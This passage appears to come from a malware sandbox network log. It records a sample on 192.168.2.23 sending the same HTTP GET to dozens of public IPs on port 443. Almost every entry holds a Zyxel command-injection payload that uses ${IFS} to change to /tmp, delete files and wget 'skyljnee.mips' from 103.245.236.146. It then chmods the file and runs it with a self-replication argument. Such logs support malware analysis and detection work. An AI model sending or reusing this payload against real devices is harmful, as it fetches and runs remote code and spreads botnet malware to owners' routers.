                                                Jan 28, 2024 10:16:17.695688009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2483192.168.2.233796875.72.30.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.695722103 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2484192.168.2.2345210143.127.63.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.695749044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2485192.168.2.2352548104.63.102.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.695776939 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2486192.168.2.235773853.35.126.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.695811987 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2487192.168.2.2338122109.35.220.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.695842028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2488192.168.2.2357556186.210.0.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.695866108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2489192.168.2.2344530179.194.111.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.695884943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2490192.168.2.2333280197.38.19.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.695924997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2491192.168.2.2357442219.195.11.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.695954084 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2492192.168.2.234970613.127.154.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.695972919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2493192.168.2.234321664.228.98.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.695982933 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2494192.168.2.2338834154.56.146.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.696018934 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2495192.168.2.2350020196.88.200.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.696032047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2496192.168.2.2341910122.34.3.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.696075916 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2497192.168.2.2337080151.13.216.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.696095943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2498192.168.2.2338580129.88.94.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.696124077 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2499192.168.2.235428414.26.179.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.696165085 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2500192.168.2.2338814120.16.33.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.696182013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2501192.168.2.235325282.76.187.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.696202993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2502192.168.2.235312842.17.116.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.696223974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2503192.168.2.2336768174.206.131.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.696271896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2504192.168.2.2347534220.205.231.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.696294069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2505192.168.2.2353788140.53.178.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.696331024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2506192.168.2.2349906216.196.98.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.696331024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2507192.168.2.2358194199.214.179.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.696332932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2508192.168.2.235309261.80.130.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.696388960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2509192.168.2.2355540161.119.73.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.696410894 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2510192.168.2.2347358106.135.215.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.696430922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2511192.168.2.2351564186.182.72.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.696474075 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2512192.168.2.2336994149.102.221.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.696499109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2513192.168.2.2333092148.36.232.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.696521044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2514192.168.2.235878850.179.33.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.696543932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2515192.168.2.236015639.144.175.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.696578979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2516192.168.2.234206299.7.79.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.696599007 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2517192.168.2.2354118138.90.188.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.696655989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2518192.168.2.2346072192.137.183.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.696659088 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2519192.168.2.2347116216.155.138.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.696696997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2520192.168.2.235126869.142.190.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.696731091 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2521192.168.2.2348814187.185.215.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.696753025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2522192.168.2.2351864200.59.119.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.696787119 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2523192.168.2.235903853.37.106.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.696813107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2524192.168.2.2347266212.202.234.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.696858883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2525192.168.2.2352026171.139.184.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.696880102 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2526192.168.2.234933427.223.98.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.696888924 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2527192.168.2.2342870198.128.161.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.696928024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2528192.168.2.2351840201.157.37.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.696959972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2529192.168.2.234452850.200.3.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.696988106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2530192.168.2.2337314219.163.163.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.697021008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2531192.168.2.234188866.152.22.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.697052956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2532192.168.2.2348506175.37.9.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.697072029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2533192.168.2.2334310190.18.115.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.697093010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2534192.168.2.2351304150.144.244.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.697113037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2535192.168.2.2337162113.147.47.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.697134018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2536192.168.2.2342584149.98.101.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.697165966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2537192.168.2.2337966149.149.165.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.697211027 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2538192.168.2.2345676112.33.58.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.697227955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2539192.168.2.2336456212.67.37.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.697263002 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2540192.168.2.2359856171.195.232.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.697319031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2541192.168.2.2346996216.153.214.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.697329998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2542192.168.2.235113038.218.195.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.697335958 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2543192.168.2.2355830209.2.17.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:17.697361946 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2544192.168.2.2355306133.82.182.74443
                                                TimestampBytes transferredDirectionData
